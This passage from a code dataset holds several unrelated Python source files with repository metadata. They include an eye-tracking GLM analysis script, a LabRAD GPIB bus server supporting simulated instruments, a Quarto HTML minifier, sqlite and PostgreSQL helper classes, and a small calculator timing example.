right', lw=1,color='#91bfdb')\nplt.plot(timerange, np.subtract(np.nanmean(neutral_cueperiod['ave_x'],0),960), label = 'neutral cue', lw = 1, color = '#636363')\nplt.axvline(x=0.026,ls='dashed', color='k',lw=1)\nplt.axhline(y=0,ls='dashed', color='k', lw=1)\nplt.legend()\nplt.title('average x coordinate relative to cue')\n\n\nplt_left = cued_cueperiod['ave_x'][cued_cueperiod['info']['trigger']==cue_trigs['cued_left']]\nplt.figure()\nfor i in range(plt_left.shape[0]):\n plt.plot(timerange, 
np.subtract(plt_left[i,:],np.nanmean(plt_left[i,476:526])),lw=1, color = '#bdbdbd')\nplt.plot(timerange, np.subtract(np.nanmean(plt_left,0),np.nanmean(np.nanmean(plt_left,0)[476:526])),lw=1, color = '#fc8d59')\nplt.axvline(x=.026,ls='dashed',color='k',lw=2)\nplt.title('all trials, cued left, rel. to cue onset')\n\nplt.figure()\nplt.plot(timerange, np.nanmean(plt_left,0), label='cued left', lw=1, color = '#fc8d59')\nplt.axvline(x=0.026,lw=1,ls='dashed',color='k')\nplt.legend()\n\n\n# -----------------------------------------------------------------------------------------------------------------------\n#epoch and plot relative to feedback that people received\nbdata = pd.DataFrame.from_csv(param['behaviour'])\ntraces2epoch = ['lp','rp']\ntimewin = [-0.5, 1.5]\n\nbdata_nleft = bdata.query('fbtrig==76')\nbdata_cleft = bdata.query('fbtrig==78')\nbdata_nright = bdata.query('fbtrig==77')\nbdata_cright = bdata.query('fbtrig==79')\n\n\n#watch out when epoching around the feedback, because the final trials feedback will be messed up if you dont wait out at the end of the task!\nfeedback_trigs = dict(neutral_left='trig76', neutral_right='trig77', cued_left='trig78', cued_right='trig79', neutral=['trig76','trig77'], cued=['trig78','trig79'])\n\ncued_fb_epoch = bce.epoch(data, trigger_values = feedback_trigs['cued'], traces = ['lp', 'rp'], twin = timewin, srate=1000)\nneutral_fb_epoch = bce.epoch(data, trigger_values = feedback_trigs['neutral'], traces = ['lp', 'rp'], twin = timewin, srate=1000)\n\n#get all feedback events\nfb_epochs = bce.epoch(data, trigger_values = ['trig76', 'trig77', 'trig78', 'trig79'], traces = ['lp', 'rp'], twin=timewin,srate=1000)\nfb_epochs = bce.apply_baseline( fb_epochs, traces=['lp', 'rp'], baseline_window = [-0.1,0.0], mode='mean' ) #baseline\nfb_epochs = bce.average_eyes(fb_epochs, traces = ['p'])\n\n#baseline pupil data\ncued_fb_epoch = bce.apply_baseline(cued_fb_epoch, traces = ['lp', 'rp'], baseline_window = [-0.1,0.0], mode='mean')\nneutral_fb_epoch = bce.apply_baseline(neutral_fb_epoch, traces = ['lp', 'rp'], baseline_window = [-0.1,0.0], mode='mean')\n\n#average pupil data across the two eyes\ncued_fb_epoch = bce.average_eyes(cued_fb_epoch , traces = ['p'])\nneutral_fb_epoch = bce.average_eyes(neutral_fb_epoch, traces = ['p'])\n\n\n#plotting\ntwin_srate = np.multiply([timewin[0], timewin[1]],fb_epochs['info']['srate']).astype(int)\ntimerange = np.divide(np.arange(twin_srate[0],twin_srate[1],1,dtype=float),fb_epochs['info']['srate'])\n\n#just plot the average for now, no separation by any behavioural information\nplt.figure()\nplt.plot(timerange, np.nanmean(cued_fb_epoch['ave_p'],0), label = 'cued' , lw = 1, color = '#3182bd') #blue for cued\nplt.plot(timerange, np.nanmean(neutral_fb_epoch['ave_p'],0), label = 'neutral', lw = 1, color = '#bdbdbd') #grey for neutral\nplt.axvline(x = 0.0, lw = 1, ls = 'dashed', color = 'k')\nplt.axvline(x = 0.5, lw = 1, ls = 'dashed', color = 'k', label = 'feedback offset')\nplt.axvline(x = 1.5, lw = 1, ls = 'dashed', color = 'r', label = 'minimum onset of next trial')\nplt.legend()\nplt.title('pupil dilation rel. 
to feedback onset')\n\n\n#sys.path.insert(0, '/Users/sammi/Desktop/Experiments/DPhil/glm')\nsys.path.insert(0, '/home/sammirc/Desktop/DPhil/glm')\nimport glmtools as glm\ncued_bdata = bdata.query('cond==\\'cued\\'') #get the cued behavioural data\n\n#glmdata = glm.data.TrialGLMData(data= cued_fb_epoch['ave_p'], time_dim=1, sample_rate=1000)\nglmdata = glm.data.TrialGLMData(data = fb_epochs['ave_p'], category_list = bdata.cue.to_numpy(), time_dim=1, sample_rate=1000)\n\nregressors = list()\nregressors.append( glm.regressors.ParametricRegressor(name= 'confdiff', values = bdata.confdiff.to_numpy(), preproc='z', num_observations = glmdata.num_observations))\nregressors.append( glm.regressors.CategoricalRegressor(category_list = bdata.cue.to_numpy(), codes = 0))\nregressors.append( glm.regressors.CategoricalRegressor(category_list = bdata.cue.to_numpy(), codes = 1))\n#regressors.append( glm.regressors.CategoricalRegressor(category_list = bdata.cue.to_numpy(), codes = (0,1)) )\n#regressors.append( glm.regressors.ParametricRegressor(name = 'condition comparison', values = bdata.cue.to_numpy(), num_observations = glmdata.num_observations) )\ncuecond = bdata.cue.to_numpy()\ncuecond = np.where(cuecond==0, -1,cuecond)\nregressors.append( glm.regressors.ParametricRegressor(name = 'condition x confdiff', values = np.multiply(bdata.confdiff.to_numpy(), cuecond), num_observations=glmdata.num_observations))\n\n\n\ncontrasts = list()\ncontrasts.append( glm.design.Contrast([1, 0, 0, 0], 'confidence deviation'))\ncontrasts.append( glm.design.Contrast([0, 1, 0, 0], 'neutral'))\ncontrasts.append( glm.design.Contrast([0, 0, 1, 0], 'cued'))\ncontrasts.append( glm.design.Contrast([0, 0, 0, 1], 'condition x confdiff'))\n\nftests = list()\nftests.append( glm.design.FTest( [0,1,1,0], 'mean condition') )\n\n\n\nglmdes = glm.design.GLMDesign.initialise(regressors, contrasts, ftests)\nprint(glmdes.ftest_names)\n\nglmdes.plot_summary()\n\nmodel = glm.fit.OLSModel( glmdes, glmdata )\n\n#i'm pretty sure that here the middle plot is plotting the beta coefficients across the length of the time series to show where the effect starts to emerge (which is awesome)\nplt.figure()\nplt.subplot(311)\nplt.plot(timerange, model.copes.T,lw=1) \nplt.legend(glmdes.contrast_names, loc = 'upper left', ncol=2)\nplt.title('COPEs')\nplt.subplot(312)\nplt.plot(timerange, model.get_tstats().T, lw=1)\nplt.axhline(y=0, ls='dashed', color='k', lw=1)\nplt.axhline(y=2.58, ls='dashed', color = '#bdbdbd') #2.58 tstat line for significance\nplt.axhline(y=-2.58, ls='dashed', color = '#bdbdbd') #2.58 tstat line for significance\nplt.legend(glmdes.contrast_names, loc = 'upper left', ncol=2)\nplt.title('t-stats')\nplt.subplot(313)\nplt.plot(timerange, np.nanmean(cued_fb_epoch['ave_p'],0), label = 'cued' , lw = 1, color = '#3182bd') #blue for cued\nplt.plot(timerange, np.nanmean(neutral_fb_epoch['ave_p'],0), label = 'neutral', lw = 1, color = '#bdbdbd') #grey for neutral\nplt.axvline(x = 0.0, lw = 1, ls = 'dashed', color = 'k')\nplt.axvline(x = 0.5, lw = 1, ls = 'dashed', color = 'k', label = 'feedback offset')\nplt.axvline(x = 1.5, lw = 1, ls = 'dashed', color = 'r', label = 'minimum onset of next trial')\nplt.legend()\nplt.title('pupil dilation rel. 
to feedback onset')\nplt.show()\n\n\nplt.figure()\nplt.plot(timerange,model.fstats.T)\nplt.legend(glmdes.ftest_names)\nplt.title('FTests')\n","repo_name":"schekroud/wmconfidence_eeg","sub_path":"analysis_scripts/py/04_WMC_eyetracking.py","file_name":"04_WMC_eyetracking.py","file_ext":"py","file_size_in_byte":12082,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"23127764890","text":"# CHANGELOG\n#\n# 2011 December 10 - Peter O'Malley & Jim Wenner\n#\n# Fixed bug where doesn't add devices if no SOCKETS connected.\n#\n# 2011 December 5 - Jim Wenner\n#\n# Added ability to read TCPIP (Ethernet) devices if configured to use\n# sockets (i.e., fixed port address). To do this, added getSocketsList\n# function and changed refresh_devices.\n#\n# 2011 December 3 - Jim Wenner\n#\n# Added ability to read TCPIP (Ethernet) devices. Must be configured\n# using VXI-11 or LXI so that address ends in INSTR. Does not accept if\n# configured to use sockets. To do this, changed refresh_devices.\n#\n# To be clear, the gpib system already supported ethernet devices just fine\n# as long as they weren't using raw socket protocol. The changes that\n# were made here and in the next few revisions are hacks to make socket\n# connections work, and should be improved.\n#\n# 2021 October 17 - Clayton Ho\n# Added back automatic device polling\n# 2021 November 25 - Clayton Ho\n# Added configurable device polling\n# 2021 December 15 - Clayton Ho\n# Subclassed it from PollingServer to support polling\n# instead of using server methods\n\n\n\"\"\"\n### BEGIN NODE INFO\n[info]\nname = GPIB Bus\nversion = 1.5.2\ndescription = Gives access to GPIB devices via pyvisa.\ninstancename = %LABRADNODE% GPIB Bus\n\n[startup]\ncmdline = %PYTHON% %FILE%\ntimeout = 20\n\n[shutdown]\nmessage = 987654321\ntimeout = 100\n### END NODE INFO\n\"\"\"\n\nfrom labrad.units import WithUnit\nfrom labrad.server import setting\nfrom labrad.errors import DeviceNotSelectedError\n\nfrom twisted.internet.defer import returnValue, inlineCallbacks\n\nimport pyvisa as visa\nfrom pyvisa_SimulatedInstrumentBackend import SimulatedInstrumentResource\n\nfrom UCLA_CS_labrad.servers import PollingServer\n\n\n\n\nKNOWN_DEVICE_TYPES = ('GPIB', 'TCPIP', 'USB','SIM')\n\n\nclass GPIBBusServer(PollingServer):\n \"\"\"\n Provides direct access to GPIB-enabled devices.\n \"\"\"\n\n name = '%LABRADNODE% GPIB Bus'\n defaultTimeout = WithUnit(1.0, 's')\n POLL_ON_STARTUP = True\n\n @inlineCallbacks \n def initServer(self):\n super().initServer()\n self.devices = {}\n self.sim_addresses=[]\n self.HSS=None\n servers=yield self.client.manager.servers()\n \n #HSS already running case\n if 'Hardware Simulation Server' in [HSS_name for _,HSS_name in servers]:\n yield self.client.refresh()\n self.HSS=self.client.servers['Hardware Simulation Server']\n yield self.HSS.signal__device_added(8675311)\n yield self.HSS.signal__device_removed(8675312)\n #GPIB Bus Servers subscribe to two types of LabRAD Signals of this Hardware Simulation Server (HSS) while booting up: device addition and device removal LabRAD Signals.\n yield self.HSS.addListener(listener=self.simDeviceAdded,source = None,ID=8675311)\n yield self.HSS.addListener(listener=self.simDeviceRemoved, source=None, ID=8675312) #assign handlers\n self.rm_phys = visa.ResourceManager()\n \n #second ResourceManager used in the GPIB Bus Server’s polls with a new backend (found in pyvisa_SimulatedInstrumentBackend),\n #where resources are simulated GPIB instruments in the HSS.\n 
#This backend is essentially a wrapper over the HSS API (settings), instead of a wrapper over the NI-VISA driver.\n #When a ResourceManager with a default backend creates a Resource object to return to a caller of its open_resource method,\n #it uses the provided resource name to determine what subclass of the base Resource class to return. For all the real GPIB devices,\n #it returns a MessageBasedResource object; thus, this object is what is always stored in a GPIB Bus Server’s client’s\n #context dictionary when they make an address (select) request. one can override the process ResourceManager uses to pick the\n #type of Resource object to return, and provide their own Resource subclass instead. We write our own Resource subclass,\n #called SimulatedInstrumentResource (which can be seen in pyvisa_SimulatedInstrumentBackend); this way we have to implement\n #less methods in the new backend and essentially have more control over how each method call on the client’s Resource object\n #acted from top to bottom, only using the PyVISA functionality to take care of getting Resources and managing VISA sessions.\n #even if this means we’re mostly just doing glorified duck-typing, using the PyVISA infrastructure of Resources and backends\n #in the GPIB Bus Server code provides the opportunity to move closer towards using the actual MessageBasedResource objects\n #with our new backend, by editing the separate file with the implementation of SimulatedInstrumentResource and the new backend.\n\n self.rm_sim = visa.ResourceManager('l@SimulatedInstrumentBackend')\n default_session=self.rm_sim.session #default resource manager session\n \n #pass tools to backend to communicate with HSS\n self.rm_sim.visalib.set_attribute(default_session,'cli',self.client)\n self.rm_sim.visalib.set_attribute(default_session,'ser',self.HSS)\n self.rm_sim.visalib.set_attribute(default_session,'node',self.name)\n # load the reference to the simulated_device_list into the new backend as its “resource collection”\n self.rm_sim.visalib.set_attribute(default_session,'sim_addresses',self.sim_addresses) #TODO: should be able to compact to one line by passing parameters when initializing resource manager\n self.refreshDevices()\n\n \n \n def _poll(self):\n self.refreshDevices()\n\n def refreshDevices(self):\n \"\"\"\n Refresh the list of known devices on this bus.\n Currently supported are GPIB devices and GPIB over USB.\n \"\"\"\n try:\n #instead of polling the simulated_device_list directly, and instantiating our own object for each new simulated device,\n #we have both the ResourceManagers list their resources at the same time.\n #Then, for each new resource name, we could get the Resource from the appropriate ResourceManager\n #and put it in the resource dictionary.\n addresses = [str(x) for x in self.rm_phys.list_resources()+self.rm_sim.list_resources()]\n additions = set(addresses) - set(self.devices.keys())\n deletions = set(self.devices.keys()) - set(addresses)\n \n for addr in additions:\n try:\n if not addr.startswith(KNOWN_DEVICE_TYPES):\n continue\n \n\n instr = self.get_resource(addr)\n instr.write_termination = ''\n instr.clear()\n if addr.endswith('SOCKET'):\n instr.write_termination = '\\n'\n self.devices[addr] = instr\n self.sendDeviceMessage('GPIB Device Connect', addr)\n except Exception as e:\n print('Failed to add ' + addr + ':' + str(e))\n raise\n for addr in deletions:\n self.devices[addr].close()\n del self.devices[addr]\n self.sendDeviceMessage('GPIB Device Disconnect', addr)\n \n except Exception as e:\n 
print('Problem while refreshing devices:', str(e))\n raise e\n \n def get_resource(self,address):\n try:\n # pyvisa picks the appropriate message-based resource class for INSTR/SOCKET addresses\n return self.rm_phys.open_resource(address) #try opening physical resource\n except Exception:\n return self.rm_sim.open_resource(address,resource_pyclass=SimulatedInstrumentResource) #if this fails, try simulated\n \n def sendDeviceMessage(self, msg, addr):\n print(msg + ': ' + addr)\n self.client.manager.send_named_message(msg, (self.name, addr))\n\n\n def getDevice(self, c):\n if 'addr' not in c:\n raise DeviceNotSelectedError(\"No GPIB address selected.\")\n if c['addr'] not in self.devices:\n raise Exception('Could not find device ' + c['addr'])\n instr = self.devices[c['addr']]\n return instr\n\n @setting(0, addr='s', returns='s')\n def address(self, c, addr=None):\n \"\"\"\n Get or set the GPIB address for this context.\n\n To get the addresses of available devices,\n use the list_devices function.\n \"\"\"\n if addr is not None:\n c['addr'] = addr\n return c['addr']\n\n @setting(2, time='v[s]', returns='v[s]')\n def timeout(self, c, time=None):\n \"\"\"\n Get or set the GPIB timeout.\n \"\"\"\n if time is not None:\n self.getDevice(c).timeout=time['ms']\n return WithUnit(self.getDevice(c).timeout/1000.0,'s')\n\n @setting(3, data='s', returns='')\n def write(self, c, data):\n \"\"\"\n Write a string to the GPIB bus.\n \"\"\"\n yield self.getDevice(c).write(data)\n\n @setting(8, data='y', returns='')\n def write_raw(self, c, data):\n \"\"\"\n Write raw bytes to the GPIB bus.\n \"\"\"\n yield self.getDevice(c).write_raw(data)\n\n @setting(4, n_bytes='w', returns='s')\n def read(self, c, n_bytes=None):\n \"\"\"\n Read from the GPIB bus.\n\n Termination characters, if any, will be stripped.\n This includes any bytes corresponding to termination in\n binary data. If specified, reads only the given number\n of bytes. Otherwise, reads until the device stops sending.\n \"\"\"\n instr = self.getDevice(c)\n if n_bytes is None:\n ans = yield instr.read_raw()\n else:\n ans = yield instr.read_bytes(n_bytes)\n ans = ans.strip().decode()\n returnValue(ans)\n\n\n #TODO: Update to use resource object's query method\n @setting(5, data='s', returns='s')\n def query(self, c, data):\n \"\"\"\n Make a GPIB query, a write followed by a read.\n\n This query is atomic. 
No other communication to the\n device will occur while the query is in progress.\n \"\"\"\n instr = self.getDevice(c)\n yield instr.write(data)\n ans = yield instr.read_raw()\n # convert from bytes to string for python 3\n ans = ans.strip().decode()\n returnValue(ans)\n\n @setting(7, n_bytes='w', returns='y')\n def read_raw(self, c, n_bytes=None):\n \"\"\"\n Read raw bytes from the GPIB bus.\n\n Termination characters, if any, will not be stripped.\n If n_bytes is specified, reads only that many bytes.\n Otherwise, reads until the device stops sending.\n \"\"\"\n instr = self.getDevice(c)\n if n_bytes is None:\n ans = yield instr.read_raw()\n else:\n ans = yield instr.read_bytes(n_bytes)\n returnValue(bytes(ans))\n\n @setting(20, returns='*s')\n def list_devices(self, c):\n \"\"\"\n Get a list of devices on this bus.\n \"\"\"\n return sorted(self.devices.keys())\n\n @setting(21)\n def refresh_devices(self, c):\n \"\"\"\n Manually refresh devices.\n \"\"\"\n self.refreshDevices()\n\n def _poll_fail(self, failure):\n print('Polling failed.')\n\n \n # SIGNALS\n @inlineCallbacks\n def serverConnected(self, ID, name):\n \"\"\"\n Attempt to connect to last connected serial bus server upon server connection.\n \"\"\"\n # case where HSS started after this bus server\n if name=='Hardware Simulating Server':\n yield self.client.refresh()\n self.HSS=self.client.servers['Hardware Simulating Server']\n\t\t\t\n yield self.HSS.signal__device_added(8675311)\n yield self.HSS.signal__device_removed(8675312)\n yield self.HSS.addListener(listener=self.simDeviceAdded,source = None,ID=8675311)\n yield self.HSS.addListener(listener=self.simDeviceRemoved, source=None, ID=8675312)\n default_session=self.rm_sim.session\n self.rm_sim.visalib.set_attribute(default_session,'ser',self.HSS)\n \n # SIGNALS\n @inlineCallbacks\n def serverDisconnected(self, ID, name):\n if name=='Hardware Simulating Server':\n self.sim_addresses.clear() #all sim addresses removed\n yield self.HSS.removeListener(listener=self.simDeviceAdded,source = None,ID=8675311)\n yield self.HSS.removeListener(listener=self.simDeviceRemoved, source=None, ID=8675312)\n self.HSS=None\n \n \n #see settings with same names in SBS\n @setting(71, 'Add Simulated Device', address='i', device_type='s',returns='')\n def add_simulated_device(self, c, address,device_type):\n if self.HSS:\n yield self.HSS.add_device(self.name,address,device_type,True)\n \n @setting(72, 'Remove Simulated Device', address='i', returns='')\n def remove_simulated_device(self, c, address):\n if self.HSS:\n yield self.HSS.remove_device(self.name,address)\n\n\n def simDeviceAdded(self, c,data):\n node, address=data\n if node==self.name:\n self.sim_addresses.append(address)\n \n def simDeviceRemoved(self, c, data):\n node, address=data\n if node==self.name:\n self.sim_addresses.remove(address)\n \n \n__server__ = GPIBBusServer()\n\nif __name__ == '__main__':\n from labrad import util\n util.runServer(__server__)\n","repo_name":"UCLALabRAD/LaSER-Project","sub_path":"UCLA_CS_labrad/servers/gpib/gpib_bus_server.py","file_name":"gpib_bus_server.py","file_ext":"py","file_size_in_byte":13466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34521077141","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\nimport re\n\ndef load_page(page_path):\n with open(page_path, \"r\", encoding=\"utf-8\") as f:\n soup = BeautifulSoup(f, \"html.parser\")\n return soup\n\n# 1. 
Remove all script tags but keep their src\ndef get_script_links(soup):\n script_links = []\n for script in soup.findAll(\"script\"):\n if script.has_attr(\"src\"):\n script_links.append(script.attrs[\"src\"])\n script.decompose()\n return script_links\n\n# 2. Move quarto-html-after-body and any other scripts to files\n# so they're not loaded before htmlwidgets etc. are loaded\ndef get_body_scripts(soup, page_name):\n body_scripts = []\n for i, script in enumerate(soup.html.body.findAll(\"script\")):\n # don't copy the data scripts here\n if not script.has_attr(\"data-for\"):\n if script.has_attr(\"id\"):\n out_file = f\"./{page_name}_files/libs/{script.attrs['id']}.js\"\n else:\n out_file = f\"./{page_name}_files/libs/body_script_{i}.js\"\n with open(out_file, \"w\", encoding= \"utf-8\") as f:\n f.write(script.get_text()) \n body_scripts.append(out_file)\n script.decompose()\n return body_scripts\n\n# 3. Remove the hardcoded json data and write to file\ndef remove_json_data(json_tag, page_name):\n Path(f\"./{page_name}_files/data/\").mkdir(exist_ok=True)\n el_id = json_tag.attrs['data-for']\n with open(f\"./{page_name}_files/data/{el_id}.json\", \"w\", encoding=\"utf-8\") as f:\n f.write(json_tag.get_text()) \n json_tag.string.replace_with(\"\")\n return el_id\n\n# 4. Create the javascript to load the data and scripts\ndef create_load_data_js(soup, page_name):\n script_links = get_script_links(soup)\n body_scripts = get_body_scripts(soup, page_name)\n json_tags = [script for script in soup.findAll(\"script\") if script.has_attr(\"data-for\")]\n el_ids = [remove_json_data(json_tag, page_name) for json_tag in json_tags] \n\n load_function = \"\"\"\n const loadScript = (file_url, async = true, type = \"text/javascript\", appendToHead = true) => {\n return new Promise((resolve, reject) => {\n try {\n const scriptEle = document.createElement(\"script\");\n scriptEle.type = type;\n scriptEle.async = async;\n scriptEle.src = file_url;\n scriptEle.addEventListener(\"load\", (ev) => {\n resolve({ status: true });\n });\n scriptEle.addEventListener(\"error\", (ev) => {\n reject({\n status: false,\n message: `Failed to load the script ${file_url}`\n });\n });\n appendToHead ? 
document.head.appendChild(scriptEle) : document.body.appendChild(scriptEle);\n } catch (error) {\n reject(error);\n }\n });\n };\n \"\"\"\n\n load_data_first_element = f\"\"\"\n fetch(\"./{page_name}_files/data/{el_ids[0]}.json\")\n .then((response) => response.json())\n .then(\n (json) =>\n (document.querySelectorAll('[data-for=\"{el_ids[0]}\"]')[0].innerHTML =\n JSON.stringify(json).replaceAll(\"/\", \"/\"))\n )\n \"\"\"\n\n load_data_all_elements = [f\"\"\"\n .then(() => fetch(\"./{page_name}_files/data/{el_id}.json\"))\n .then((response) => response.json())\n .then(\n (json) =>\n (document.querySelectorAll('[data-for=\"{el_id}\"]')[0].innerHTML =\n JSON.stringify(json).replaceAll(\"/\", \"/\"))\n )\n \"\"\" for el_id in el_ids]\n\n if(len(el_ids) > 1):\n load_data_all_elements.pop(0)\n load_data_next_elements = \"\".join(load_data_all_elements)\n else:\n load_data_next_elements = \"\"\n\n then_load_scripts = \"\\n\".join([f'.then(() => loadScript(\"{script}\"))' for script in script_links])\n then_body_scripts = \"\\n\".join([f'.then(() => loadScript(\"{script}\"))' for script in body_scripts])\n then_render_mermaid = \".then(() => window.mermaid.init())\" # mermaid charts will not render otherwise\n then_render_html = \".then(() => window.HTMLWidgets.staticRender());\"\n\n script_content = f\"\"\"\n {load_function}\n {load_data_first_element}\n {load_data_next_elements}\n {then_load_scripts}\n {then_body_scripts}\n {then_render_mermaid}\n {then_render_html}\n \"\"\"\n return script_content\n\ndef insert_main_js_script(soup, page_name):\n load_data_js = create_load_data_js(soup, page_name)\n s = soup.new_tag(\"script\")\n s.string = load_data_js \n soup.html.head.append(s) \n\ndef save_new_html(soup, page_name):\n outfile = f\"{page_name}_min.html\"\n with open(outfile, \"w\", encoding='utf-8') as file:\n file.write(str(soup))\n print(f\"File created: {outfile}\")\n\ndef create_page_min(page_path):\n soup = load_page(page_path)\n page_name = re.sub(\"\\\\.html$\", \"\", page_path.name)\n print(f\"Converting {page_path}\")\n insert_main_js_script(soup, page_name)\n save_new_html(soup, page_name)\n\ndef make_all_html_min(files_to_exclude = [\"example_file_to_exclude.html\"]):\n # .endswith(\"min\") is quick and dirty shortcut to not apply this script to files it creates\n files_to_make_min = [f for f in Path(\"./\").glob(\"*.html\") if not f.name.endswith(\"min.html\")]\n files_to_make_min = list(set(files_to_make_min) - set([Path(f) for f in files_to_exclude]))\n\n print(\"This script will create a minimal version of the following files:\"\"\")\n for file in files_to_make_min:\n print(f\" - {file.name}\")\n input(\"To continue press any key or to cancel press Ctrl+C\")\n \n for page_path in files_to_make_min:\n create_page_min(page_path)\n\nmake_all_html_min()\n\n","repo_name":"samrickman/goltc-dsn-maps-cartograms-blog","sub_path":"3__remove_hardcoded_data.py","file_name":"3__remove_hardcoded_data.py","file_ext":"py","file_size_in_byte":5713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21515769023","text":"'''\nName: custom_functions.py\nVersion: 1.0\nDescription:\nRelease_date:\nUpdated_date:\nAuthor:\n\nRelease note:\n 1.0 - removing bugs...\n 0.2beta - ....\n 0.1beta - ....\n \n\n'''\n\n\n# Importamos las librerías de sistema\nimport sys\nimport os\nimport json\nimport logging\n\nfrom argparse import ArgumentParser\nfrom datetime import datetime, timezone\nfrom time import sleep\nimport requests\nimport pandas as 
pd\nimport numpy as np\nimport sqlite3\n\n\n#import load_dotenv\n\n# Ruta del sistema\n\nsys.path.append(\n os.path.abspath(os.path.join(\n os.path.dirname(__file__), os.path.pardir\n ))\n)\n\nenv_path = os.path.join('setup', '.env')\n#load_dotenv(env_path)\n\n# Configuramos el formato del logger\nFORMAT = '%(asctime)-15s - %(message)s'\nlogging.basicConfig(format=FORMAT\n ,level=logging.INFO\n ,filemode='w'\n )\nlogger = logging.getLogger(\"main.py\")\nlogger.setLevel(\"INFO\")\n\n\n# Definimos los argumentos o parámetros \n\ndef get_args():\n '''\n Recogemos los argumentos del script main.py\n '''\n global options\n logger.info(\"--- Get args initialized ---\")\n parser = ArgumentParser(description=\"Get args from main.py\")\n parser.add_argument('--env', default='DEV',\n choices=['DEV','QA','PRO'], type=str,\n required=True, help='Please select the environment')\n parser.add_argument('-ds', '--data_source', \n default=1, type=int,\n required=False, help=\"\"\"\n Select type of data source:\n '1' : 'BostonHousing',\n '2': 'Iris',\n '3' : 'Titanic'\n \"\"\"\n )\n parser.add_argument('--dbtable', type=str)\n options = parser.parse_args()\n logger.info(\"--- Get args loaded --- \\n\")\n \n \nclass TheBridgeDatabase():\n \n '''\n Creamos la clase TheBridgeDatabase..\n '''\n \n def __init__(self, env):\n '''\n Args:\n ----\n creds_file: from config dictionary values\n Return:\n ------\n credenciales variables for database\n '''\n self.environment = env\n # self.db_endpoint, self.db_port, self.db_name, self.db_schema, self.db_user, self.db_pass = creds_file.values() #noqa\n # self.uri = f'mssql+pymssql://{self.db_user}:{self.db_pass}@{self.db_endpoint}:{self.db_port}/{self.db_name}' #noqa\n # self.engine = create_engine(self.uri)\n print(self.environment)\n logger.info(f\"--- {TheBridgeDatabase.__name__} has been initialized ---\")\n \n \n def create_database_sqlite(self, path=None):\n self.conn = sqlite3.connect(f'thebridge_dwh_{self.environment}.db')\n cursor = self.conn.cursor()\n with open('src/data/raw/practica_sql_script_erp.sql', 'r') as q:\n sql = q.read()\n cursor.executescript(sql)\n return cursor\n\n def read_table(self, table_name=None):\n self.tables = pd.read_sql(f\"\"\" select *\n from sqlite_master \n where type='table' and\n name = '{table_name}'\n order by name;\n \"\"\", self.conn)\n return self.tables\n\n \n \n\n# with open('BBDD_ERP_data.sql', 'r') as q:\n# sql = q.read()\n# cursor.executescript(sql)\n \n# pd.read_sql(\"\"\" select *\n# from sqlite_schema\n# \"\"\", conn)\n\ndef remove_kg(row, custom_attr=None):\n row = row.lower()\n if 'kg' in row:\n return float(row.split('kg')[0])\n else:\n return float(row)\n \ndf['Weight'].apply(remove_kg)","repo_name":"jsanz81/001","sub_path":"week21/proyecto/src/utils/custom_functions (con parte creacion BD).py","file_name":"custom_functions (con parte creacion BD).py","file_ext":"py","file_size_in_byte":3772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7284504347","text":"# coding: utf-8\n\nfrom sqlalchemy.inspection import inspect\nfrom sqlalchemy.ext.declarative import declared_attr\n\nfrom marco.ext import db\n\n\nclass Base(db.Model):\n\n __abstract__ = True\n\n def __repr__(self):\n attrs = ('%s=%r' % (attr.key, attr.value) for attr in inspect(self).attrs)\n attrs_str = ', '.join(attrs)\n return '%s(%s)' % (self.__class__.__name__, attrs_str)\n\n @declared_attr\n def id(cls):\n return db.Column(db.Integer, 
primary_key=True)\n","repo_name":"tonicbupt/marco","sub_path":"marco/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3467106426","text":"from timeit import timeit\n#import timeit\nimport _collections\n\nclass Calculadora():\n \"\"\"As variaveis são declaradas aqui\"\"\"\n def __init__(self, x,y):\n self.UNO = x\n self.DUO = y\n\n\n def soma(self):\n \"\"\"Esta Classe assim como todas as outras Usam as variaveis declaradas em __init__ da Classe\"\"\"\n somar = self.UNO + self.DUO\n return somar\n #print(somar)\n\n def subtrai(self):\n \"\"\"Neste caso UNO e DUO\"\"\"\n sub = self.UNO - self.DUO\n return sub\n\n\ns = Calculadora(120, 12)\n#Acessamos as funções que lidam com os valores que foram dados á Classe\nprint(\"\", s.soma(), \"\\n\", s.subtrai())\n\n\n#Testa quanto tempo cada função gasta para o processamento:\nprint(timeit('s.subtrai()', globals=globals()))\nprint(timeit('s.soma()', globals=globals()))\n\n#print(globals())\n\n\"\"\"\nclass Dog:\n\n def __init__(self, nome, idade):\n self.NOME = nome\n self.IDADE = idade\n\n\nbob = Dog('Bob', 11)\nprint(bob.NOME, bob.IDADE)\n\"\"\"\n","repo_name":"DiksonSantos/GeekUniversity_Python","sub_path":"Aula_175_Optimizacoes.py","file_name":"Aula_175_Optimizacoes.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31919308967","text":"import os\nimport errno\n# import psycopg2 as pg\n# import pandas.io.sql as psql\n\n\nclass DBControl:\n '''\n DB control class.\n '''\n\n def __init__(self, con_str: str = None):\n if con_str is None:\n raise ValueError(\n errno.EINVAL, os.strerror(errno.EINVAL), 'con_str')\n self.__con_str = con_str\n\n # Getter\n\n def get_con_str(self):\n return self.__con_str\n\n def set_con_str(self, con_str: str = None):\n if con_str is None:\n raise ValueError(\n errno.EINVAL, os.strerror(errno.EINVAL), 'con_str')\n self.__con_str = con_str\n return self\n\n # private method\n\n def __get_connection(self):\n import psycopg2 as pg\n return pg.connect(self.get_con_str())\n\n # public method\n\n def get_db_dataframe(self, sql: str = None, param: dict = None):\n import pandas.io.sql as psql\n if sql is None:\n raise ValueError(\n errno.EINVAL, os.strerror(errno.EINVAL), 'sql')\n if param is None:\n param = {}\n\n with self.__get_connection() as con:\n df = psql.read_sql(sql, con, params=param)\n return df\n\n\nif __name__ == '__main__':\n 